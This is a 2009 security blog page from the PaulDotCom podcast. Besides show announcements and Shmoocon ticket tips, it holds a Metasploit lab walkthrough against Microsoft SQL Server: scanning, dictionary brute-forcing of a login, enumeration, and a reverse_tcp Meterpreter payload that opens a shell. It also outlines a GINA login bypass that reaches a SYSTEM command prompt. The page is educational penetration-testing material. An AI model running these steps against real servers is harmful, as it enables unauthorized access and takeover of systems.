Sponsored By:
The PaulDotCom crew interview Chris Hoff and talk about security in the real world, the cloud, cigars, and martial arts!
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds: 
Tomorrow, December 1, 2009 at noon the second round of Shmoocon tickets sales begins. I got lucky and scored my ticket in round 1. But, I made several mistakes when trying to register and almost missed out. I thought I might throw out a few pointers based on my experience in round one out there for those of you who are going to try and register tomorrow.
First here is a general overview of the process in round one. At noon, tickets went on sale at the www.shmoocon.org website. On the registration page I was asked for an email address and how many tickets I wanted. I was allowed to register for either 1 or 2 tickets. If the number of tickets selected was available, I was taken to a site where I entered a CAPTCHA to verify I'm human. If I entered the CAPTCHA correctly, I was given a code that can be used to register. With the code in hand, I could relax and come back later to register for the barcode. An hour after the initial registration started, they turned on a page where I could use the code to register.
Last time tickets appeared to have been gone within the first 15 minutes, but there were actually tickets in the system for about an hour. With that in mind, here are my tips:
- Be ready at 12:00 noon EST.
- Start at the registration page
- Don't just sit at the top of the registration page refreshing. The link may not be at the top! It may be anywhere on the page including the bottom. I suggest looking through the entire page once registration begins at noon.
- Check for updates and communication from the shmoo group on both the websites NEWS section and their twitter feed. In round one, only the news site was updated, but you never know. At 12:00 noon they did post a note on the new site announcing that round one had begun.
- Continue attempting to register from 12:00 noon until you see an announcement on one of the afore mentioned sites. They did post a message when all the tickets were gone.
- If its a tight race, only go for 1 ticket. If you select 2 tickets and only 1 is available you may miss your chance at that one ticket.
- Don't be discouraged by error messages or messages telling you that all the tickets are sold out until you see a note from the group saying all tickets are gone. In round 1, tickets were still available but I repeatedly got a message telling me they were all gone and to come back on December 1st. I continued trying and did get a ticket after being told many many times they were sold out.
- Past performance is not an indicator of future results. Everything could change between rounds.
The rest of this is my speculation on how I think I lucked into a ticket. Its all conjecture, but it might be helpful. I THINK that several people tried to get creative and register automatically and didn't anticipate the CAPTCHA. As a result, their bots would tie up tickets until some timeout period was reached and then the ticket was added back into the registration system. This resulted in the "All tickets are gone" message appearing until they timed out and were released back into the system. When they were added back into the system the first person, or perhaps the first COUPLE of people to grab the ticket were given the CAPTCHA. The first person to enter the CAPTCHA correctly got the registration code. That leads me to my last tip...
- TYPE FAST
That's it! Good luck tomorrow. See you in DC in February!
We managed to get the video for the second half of episode 177 where we discuss the stories of the week. The audio on the Skype side was a little quiet (sorry!). Come watch as we broadcast from the workshop and smoke cigars!
Audio release coming soon (better quality audio than the video).
Paul talks about building a security lab on the cheap, and a SPECIAL GUEST APPEARANCE!!!
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
Now a days hacking has shifted from attacking systems to know how they work or for the trill of getting into a system for the sake of the hunt but many hackers are doing it for profit, in fact many companies around the world and states are employing hacker for information both for political and financial gain. One of the places where most of this information resides is in databases and one of the most popular databases in enterprises and governments now a days is Microsoft SQL Server and on this blog post I will cover some of the attacks you can do against this system with Metasploit 3.3.
The Microsoft SQL Server Product is in fact a suite of products compromise of several services like reporting, integration and others, in addition there is large number of types depending on the version like for instance in MSSQL 2000 there is a MSDE edition for Desktops that is small and lite, there is an Express, Web, Standard and Enterprise to mention the most popular with MSSQl 2005 and 2008 so in this blog post I will focus mainly on the Database component of it. MSSQL listens on 2 ports, port TCP 1433 and UDP port 1434, server instances get a random TCP port and this port can be obtain thru the UDP port 1434. It has 2 methods of authentication that can be configured SQL Authentication and Windows Authentication. This 2 methods differ in terms where the Account Credentials are stored and what policy is applied to such account. In MSSQL 2000 the SQL Authentication is one of the most abused methods of gaining access to the database since it does not log authentication attempts by default, it is clear text and one of the most abused methods is that by default there is no account lockout of password policy on this version on MSSQL, now on the most recent version SQL 2005 and SQL 2008 this differ in terms that the account policy being applied to the Windows host where the database engine is running, I have seen in production environments DBAs (Database Administrators) disable the policy checks for SQL accounts in the latest versions. Another one of the drawbacks of using SQL Authentication is the presence of the SA account, this account runs as sysadmin on the Database Engine and thru the store procedures on MSSQL it can execute command against the host OS under the privileges under whish the Database Engine is running under. As you can see using Windows Authentication is the way to go when performing hardening of a MS SQL system and making sure developers use Windows Accounts. One important note is that when the server is set for SQL Authentication it will also Authenticate Windows Users this is known as Mixed mode. In MSQL 2000 and 2005 the local Administrators group is given the sysadmin role by default and on MSSQL 2008 only the local Administrator account is given permission, on MSSQL Clusters the service account for the Database Engine has to be a domain account and in many installations I have seen this account be part of the Domain Administrators Group. This information can be of great use when doing post exploitation on a MSSQL host. Another important part of MSSQL systems is that they come with a large number of Stored Procedures that permit Command Execution on the host, modification of the hosts registry, File manipulation, sending emails and many other functions as “Features” making the post exploitation aspect of MSSQL attack a very interesting one.
So lets start by finding all host running MSSQL Database Instances on a network for this Metasploit has an auxiliary module called mssql_ping, below you will see how to use this module and see the options it offers from a msfconsole window
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info
Name: MSSQL Ping Utility
Version: 6479
License: Metasploit Framework License (BSD)
Provided by:
MC <mc@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the MSSQL instance for information.
msf auxiliary(mssql_ping) > show advanced
Module advanced options:
Name : CHOST
Current Setting:
Description : The local client address
Name : CPORT
Current Setting:
Description : The local client port
Name : ConnectTimeout
Current Setting: 10
Description : Maximum number of seconds to establish a TCP connection
Name : Proxies
Current Setting:
Description : Use a proxy chain
Name : SSL
Current Setting: false
Description : Negotiate SSL for outgoing connections
Name : SSLVersion
Current Setting: SSL3
Description : Specify the version of SSL that should be used (accepted: SSL2,
SSL3, TLS1)
Name : ShowProgress
Current Setting: true
Description : Display progress messages during a scan
Name : ShowProgressPercent
Current Setting: 10
Description : The interval in percent that progress should be shown
The 2 options we need are the RHOSTS and the THREADS options. Lets set and run the module against the network in my lab.
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(mssql_ping) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_ping) > run
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] SQL Server information for 192.168.1.108:
[*] tcp = 1433
[*] Version = 9.00.1399.06
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K501
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] SQL Server information for 192.168.1.156:
[*] tcp = 1433
[*] Version = 10.0.1600.22
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K801
[*] Scanned 155 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >
As it can be seen 2 servers where found, know I like to corroborate always my findings with other tools so I can be sure I’m targeting the correct targets and the correct versions, for this we will use the nmap por sacnner with one of their nse scripts
carlos@loki:~$ sudo nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-11-26 21:25 AST
NSE: Script Scanning completed.
Nmap scan report for 192.168.1.108
Host is up (0.00071s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: ServerName;DBSQL2K501;InstanceName;TESTLABINST;IsClustered;No;Version;9.00.1399.06;tcp;1033;;
| Server name: DBSQL2K501
| Server version: 9.00.1399.06 (RTM)
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTLABINST
| TCP Port: 1033
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:1B:83:F5 (VMware)
Nmap scan report for 192.168.1.156
Host is up (0.00073s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: Discovered Microsoft SQL Server
| Server name: DBSQL2K801
| Server version: 10.0.1600.22
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTINST
| TCP Port: 1123
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:38:20:33 (VMware)
Nmap done: 2 IP addresses (2 hosts up) scanned in 2.79 seconds
carlos@loki:~$
As it can be seen by the nmap scan there is a second instance on each of the host files, one special note is that when you run the nmap scan with the ms-sql-info nse script that the scan be a UDP scan and nmap must be ran as root. Another way is to use Nessus in command line mode with the plug-in id 10674
carlos@loki:/opt/nessus/bin$ sudo ./nessuscmd -i 10674 192.168.1.0/24 --max-hosts 25
Starting nessuscmd 4.0.2
Scanning '192.168.1.0/24'...
+ Host 192.168.1.1 is up
+ Host 192.168.1.2 is up
+ Results found on 192.168.1.108 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K501
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1433
|
|
| ServerName : DBSQL2K501
| InstanceName : TESTLABINST
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1033
|
|
+ Results found on 192.168.1.156 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K801
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1433
|
|
| ServerName : DBSQL2K801
| InstanceName : TESTINST
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1123
|
|
+ Host 192.168.1.157 is up
+ Host 192.168.1.179 is up
+ Host 192.168.1.194 is up
+ Host 192.168.1.232 is up
+ Host 192.168.1.239 is up
+ Host 192.168.1.245 is up
carlos@loki:/opt/nessus/bin$
As it can be seen each tools gives a different level of information, but I have found that one of the fastest ways is to use Microsoft own tools, the Microsoft SQL Server Management Studio that comes as part of MS SQL 2005 and MS SQL 2008 is on the fastest at finding MSSQL Machines on the same subnet and also helps in identifying any other MS SQL Services that might be available something that the other tools do not detect or look for.
we start by bringing up Microsoft SQL Server Management Studio and in the login box selecting to Browse for More servers than the ones local
On the Next screen we select the Network Servers tab and there we will see what it discovered.
Now for our next attack we will do a brute force attack but first we have to find out if the servers are configured for SQL Authentication and here management studio comes in to play again, we can select a sever give it bogus credentials and the error message we get back will tell us if it is.
When we get a message that says the user is not associated with a trusted SQL Server Connection it means that there is a miss match of protocol giving us the information that it does not support SQL Authentication. If SQL Authentication is enabled the message would be login failed message
Now that we know whish server to attack with the brute force we can choose the SA account but since this server is a MS SQL 2008 we know that since it is disabled by default we might have to try another one if SA fails, in our case we will assume we got the user meta from an IIS 500 error. in Metasploit we load the brute force login module for MS SQL
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info
Name: MSSQL Login Utility
Version: 7185
License: Metasploit Framework License (BSD)
Provided by:
MC <mc@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_PASS_FILE no A dictionary of passwords to perform a bruteforce attempt
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads
Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).
We have to give it our target host in the RHOST variable, the username to test in MSSQL_USER and the dictionary file in MSSQL_PASS_FILE. The THREADS will depend on the network connection and load of the target for this example I will leave it as it is but I tend to start with 50 and the reduce in increments of 5 if I get any error
msf auxiliary(mssql_login) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txt
MSSQL_PASS_FILE => /tmp/dict.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.156
RHOSTS => 192.168.1.156
msf auxiliary(mssql_login) > run
[*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) >
Now that we have a username and password lets enumerate the MSSQL server with the enumeration module
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > info
Name: Microsoft SQL Server Configuration Enumerator
Version: 7226
License: Metasploit Framework License (BSD)
Provided by:
Carlos Perez <carlos_perez@darkoperator.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port
Description:
This module will perform a series of configuration audits and
security checks against a Microsoft SQL Server database. For this
module to work, valid administrative user credentials must be
supplied.
msf auxiliary(mssql_enum) >
We will provide the username and password we found in addition to the target and run it
msf auxiliary(mssql_enum) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set RHOST 192.168.1.156
RHOST => 192.168.1.156
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf auxiliary(mssql_enum) > run
[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
[*] Jul 9 2008 14:43:34
[*] Copyright (c) 1988-2008 Microsoft Corporation
[*] Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Databse Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb
[*] Databse Files for tempdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*] Database name:model
[*] Databse Files for model:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*] Database name:msdb
[*] Databse Files for msdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] sa
[*] ##MS_SQLResourceSigningCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_AgentSigningCertificate##
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] dangerlogin
[*] meta
[*] Disabled Accounts:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] No Accounts Policy is set for:
[*] dangerlogin
[*] meta
[*] Password Expiration is not checked for:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] dangerlogin
[*] meta
[*] System Admin Logins on this Server:
[*] sa
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] meta
[*] Windows Logins on this Server:
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] Windows Groups that can logins on this Server:
[*] No Windows Groups where found with permission to login to system.
[*] Accounts with Username and Password being the same:
[*] meta
[*] Accounts with empty password:
[*] No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] sp_replsetsyncstatus
[*] sp_replcounters
[*] sp_replsendtoqueue
[*] sp_resyncexecutesql
[*] sp_prepexecrpc
[*] sp_repltrans
[*] sp_xml_preparedocument
[*] xp_qv
[*] xp_getnetname
[*] sp_releaseschemalock
[*] sp_refreshview
[*] sp_replcmds
[*] sp_unprepare
[*] sp_resyncprepare
[*] sp_createorphan
[*] xp_dirtree
[*] sp_replwritetovarbin
[*] sp_replsetoriginator
[*] sp_xml_removedocument
[*] sp_repldone
[*] sp_reset_connection
[*] xp_fileexist
[*] xp_fixeddrives
[*] sp_getschemalock
[*] sp_prepexec
[*] xp_revokelogin
[*] sp_resyncuniquetable
[*] sp_replflush
[*] sp_resyncexecute
[*] xp_grantlogin
[*] sp_droporphans
[*] xp_regread
[*] sp_getbindtoken
[*] sp_replincrementlsn
[*] Instances found on this server:
[*] MSSQLSERVER
[*] TESTINST
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] NT AUTHORITY\NETWORK SERVICE
[*] Instance TESTINST SQL Server Service is running under the privilage of:
[*] LocalSystem
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >
Now we know what stored procedures are enabled or not, accounts, if policy is applied and a wealth of other information to continue our attack. One critical piece of information is that the instance is running as LocalSystem so we can get a shell on the system since if it was Network Service we would not be able to to start our shell, since nothing beats having a nice Meterpreter shell lets move from SQL access to shell on the host with the MSSQL Payload Exploit module
msf exploit(mssql_payload) > info
Name: Microsoft SQL Server Payload Execution
Version: 7236
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port
Payload information:
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.
References:
http://www.osvdb.org/557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.securityfocus.com/bid/1281
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf
msf exploit(mssql_payload) >
We set our values including our payload and we let the exploit module run
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(mssql_payload) > set RHOST 92.168.1.156
RHOST => 92.168.1.156
msf exploit(mssql_payload) > set MSSQL_USER meta
MSSQL_USER => meta
msf exploit(mssql_payload) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf exploit(mssql_payload) > exploit
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on port 4444
[*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)
meterpreter > sysinfo
Computer: DBSQL2K801
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter >
One of the trends I see in malware going forward is more of a focus on obfuscation. If we take Conficker as an example of things to come, the future will be interesting indeed.
What exactly does this mean to you? Well, it means that traditional detection techniques are going to be more and more limited. Even the major AV vendors are starting to see the end of traditional black-list approaches. Also, here at PaulDotCom we have had quite a few post and discussions on how blacklist AV is broken. We will start seeing more and more malware that uses contextual payloads to generate a "unique" executable for every segment in the infection group. We also will start seeing more and more malware that is targeted to a specific goal.
Please, take a few moments and take a look at
clampi. This interesting piece of malware does a pretty good job of obfuscation and is targeted towards capturing financial information.
We will also see more and more malware that is utilizing encrypted channels for communication. This is something that has been predicted for years, but never materialized as much as it could have. And why would the attackers go through the extra effort? What they are doing works perfectly well...for now.
This is where we as the security community need to start preparing for the next generation of Malware today. Ask yourself, if you encountered a strange executable that was not flagged by AV how would you approach it? We have covered tools like Volatility to look at the memory on a system. But what about data on the network? If an attacker is encrypting their traffic it may make it difficult to ascertain what they are doing, what they have done, and what their goals are.
To help this I would like to introduce you to a tool called Echo Mirage.
This is just another excellent tool from the folks at Bindshell.net.
The reason tools like this are critical is we need to have the ability to see inside encrypted channels. This tool allows you to see (and edit!!) the data being set and received within an SSL session. It also does a great job of looking at unencrypted traffic as well.... But you could just use Wireshark for that.
- strandjs
John Strand will be teaching SANS Network Penetration Testing in
London from 11/30 to 12/6 2009, and SANS hacker techniques and Incident Response in New Orleans from 01/10/10 till 01/18/10.
What better way to emerge from your (Wild) Turkey stupor than to join the PDC crew and guest Christofer Hoff live at 20:30 EST on Friday November 27th for Episode 177 of PaulDotCom Security Weekly! We promise not to ask you to pass the gravy or overstay our welcome in exchange for your agreement to not Hassle the Hoff.
As a special treat, the PDC crew will be recording from Larry's barn! At least, Larry told us it's his barn (Social Engineering paranoia sets in after a while & we begin to question just about everything these days).
The live stream should be active around 8:30 EST, Friday night. Please keep in mind that the recording start time is dependent on the amount of tryptophan in our blood streams.
For bonus effect, join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat!
Please join us, enjoy the show live, and thanks for listening!
- Paul, Carlos, Mick, Larry, John, & Darren.
In case you missed it, we are recording the live video from the shows and re-releasing them. This is still in the experimental phases, but I hope everyone enjoys! If the feedback is positive we will do this for each episode and incorporate more video-friendly elements.
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Part 1:
"In Part one of the episode we interview the CTO of Cenzic, Lars Ewe. Paul butchers the pronunciation of his last name, but Lars sticks around to talk shop, discuss web application vulnerabilities, same origin polices, and the recent controversy over the latest trends report."
Part 2:
"Paul talks about building a security lab on the cheap, and a SPECIAL GUEST APPEARANCE!!!"
In Part one of the episode we interview the CTO of Cenzic, Lars Ewe. Paul butchers the pronunciation of his last name, but Lars sticks around to talk shop, discuss web application vulnerabilities, same origin polices, and the recent controversy over the latest trends report.
Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez
Audio Feeds:
MSGINA.DLL is a dynamic link library called by the Winlogon process that is responsible for presenting the user with the familiar Windows login prompt. There are MANY third party systems on the market today that either replace MSGINA or insert themselves into the login process using "gina chaining". Examples, of such products include most password self service systems, biometric and other two factor authentication systems, and VPN clients that establish your network connection before the normal login process occurs.
Recent experience has led me to believe that many of these systems may be vulnerable to authentication bypass attacks. You walk up to the machine and without entering any username or password you have a full access to the computer. In this image (IMAGE1) you see a print screen taken from a system that suffers from just such a problem.
View larger image
IMAGE1
Although the Windows login prompt generated by the vendor GINA is still on the screen we are able to get a full interactive desktop and, as the name on the Start Menu illustrates, we are running under the all powerful system account. How could this happen? Easy, when a software developer either replaces or chains Microsoft's MSGINA.DLL they have be be very careful to restrict what the user can do within their new GINA. A permissive GINA gives an unauthenticated user full access to the machine. For example, last month Tyler Spivey found a bypass in "JAWS". JAWS is a screen reader application for the visually impaired. You can read about what Tyler found here.
Similarly, if you have a password self service system that replaced your GINA with a new gina that included a "Forgot Password" button, you may have a problem. Imagine that the Forgot Password button launches a web browser that takes you to a website where the user can reset their password. Imagine further, that the GINA developers simply used a visual studio browser object that was based on Internet Explorer when developing their GINA. If they do not prevent the user from viewing the source on the website (Right-Click-> View Source) an attacker is given access to NOTEPAD.EXE. From there an attacker simply has to select "FILE->OPEN", browse to "C:\WINDOWS\SYSTEM32\CMD.EXE", Right-Click on it and select "OPEN" to get a command prompt WITHOUT logging in to the system. Whats more, if the attacker wants a full interactive desktop they could simply type "START USERINIT" from the command prompt to launch the normal windows process that gives them their desktop. The developer may have thought to disable the "RIGHT CLICK" functionality to allow you to view source, but overlooked keyboard combination to do the same such as SHIFT-F10, CONTROL-SHIFT-F10, ALT-SHIFT-F10, etc. The end result is, doing a secure GINA replacement properly isn't easy. There are a lot of opportunities for error. After mentioning these types of attacks in a SANS 401 class I taught in Charleston, one of the students checked and discovered a similar bypass in a GINA replacement they use a work. Do you have a GINA replacement? Take a few minutes to check it out, you may be surprised by what you find.
Here are some tips when considering a GINA replacement product
1)Don't. Avoid it if you can.
2)If you must, use GINA chaining instead of replacements. A full GINA replacement must replace all the informative screens in MSGINA.DLL including the "Now Applying Group Policy Settings" and "Installing 1 of 400 software patches and shutting down, DO NOT POWER OFF". A GINA that fails to implement these important screens will likely result in impatient users powering off machines during software updates and corrupting their OS installations.
3)Thoroughly test the GINA going through EVERY screen, paying special attention to keyboard shortcuts, to see if you can get a standard windows File dialog box. If you can, you've got trouble.
4)For Vista and better, consider using systems that use Microsoft's hybrid credentials provider API's rather than a GINA replacement. Does this solve the problem? Probably not, I think developers can still develop unsecured login processes, but I liken it to using Parameterized SQL Statements as opposed to building SQL statements and executing them. The rigor enforced by the API calls gives you a better chance of success.
As always, practice responsible disclosure (Image2)
View image
(Image2)
-Mark Baggett
Still think allowing users to upload files to your server is OK?
There has been quite a bit of buzz surrounding the newest Flash attack. Please review this site for a quick write-up. I want to make it clear this attack vector is different than a remote vulnerability in Flash. This attack is focused on an individual uploading a flash file to a server and then having it execute when a user visits the site.
Adobe has a nice write-up out lining the issue and their initial response to the problem here. I really like the write-up and the quote of a core axiom of computer security: "If you allow a bad guy to upload programs to your web site, it's not your web site anymore." That is very true.
However, in the article they re-state that the issue at hand is the Same Origin Policy issue. Mike Bailey of Foreground Security neatly breaks down where the Adobe response fails to completely address the issue here.
The point he makes is Adobe draws similarities between Javascript and SWF files. He shows that this comparison has some very interesting limitations. First, simply uploading a .js file to a webserver does not mean the file can be executed. However, if someone were to upload a .swf file to the server it can be executed within the context of the server. Now… Here is where it gets interesting, if a user loads a .swf file to a server and changes the extension, it can still execute within the context of the server. Who thought this was a good idea?
His point is that the scenarios where .swf files can be executed is far more pervasive then the .js counterparts that Adobe discusses.
The reason this fascinates me is that it is outside the bounds of what penetration testers would normally look for in a web application. Because this attack vector is not a remote exploit, it does not get the buzz that it deserves. The point is that when we are testing we need to look for vulnerabilities and attacks that attackers would use. This attack vector is definitely in that category. Further, this is not something that is easily fixed with a patch.
There are two things we need to take from this. First, file upload attacks have to be in your arsenal. Second, from the defensive side, Adobe is right. As much as I would like disagree with the technical aspects of their response to this vulnerability, they are correct. If you design your web infrastructure to allow file uploads and for those uploads to be executed, there are going to be serious security ramifications. What would be the alternative? Flash could try fix their plugin to at least validate file extensions before executing, or possibly require the content-type headers in the HTML (not in the file) before executing the flash, thus bringing it more in line with the analogy with Javascript they discussed in their write-up.
Until they do (and I don't expect this to happen any time soon) we will have a new vector to test for in our engagements.
-strandjs
John Strand will be teaching SANS Network Penetration Testing in
London from 11/30 to 12/6 2009, and SANS hacker techniques and Incident Response in New Orleans from 01/10/10 till 01/18/10.
Witness first hand the hackalicious bomb which the PaulDotCom (PaulDotBomb?) crew drops on a weekly basis! Join us live at 19:30 EST on Thursday November 19th for Episode 176 of PaulDotCom Security Weekly, where Lars Ewe kindly offers to hack your website, for free, no less!
Furthermore, Mr. PaulDotCom proudly presents "Setting up your very own hacking lab", in which Paul will walk you through easy ways to acquire web applications, software and vulnerable operating systems.
The live stream should be active around 7:30 EST, Thursday night. Please keep in mind that the recording time start is dependent on the length of fuse we've rolled out.
Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
PaulDotCom Livestream - All new with Video and Chat!
Please join us, enjoy the show live, and thanks for listening!
- Paul, Carlos, Mick, Larry, John, & Darren.
Get it here!
There are a couple of very cool things in this release. First, there are now standalone installs for Windows and Linux. This is a nice feature in light of some of the recent conflicts between Ruby versions and the framework.
Another feature that I like is the ability to embed Payloads into other .exe files. The OSVDB references are also very nice when it comes to report creating time. NX support in payloads will be a big help.
